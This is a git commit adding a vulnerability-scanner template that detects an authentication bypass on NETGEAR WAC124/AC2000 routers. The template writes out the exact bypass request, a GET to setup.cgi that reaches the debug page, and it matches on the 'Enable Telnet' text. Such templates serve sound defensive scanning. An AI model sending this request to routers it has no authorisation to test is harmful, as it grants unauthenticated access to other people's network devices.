Create netgear-wac124-router-auth-bypass.yaml (#3986)

* Create netgear-wac124-router-auth-bypass.yaml

This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>

* misc update

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
gy741 2022-03-28 00:10:41 +09:00 committed by GitHub
parent 3e5fb9bb7f
commit 04ec5b6b6d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 Router Authentication Bypass
author: gy741
severity: high
description: |
This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
tags: netgear,auth-bypass,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"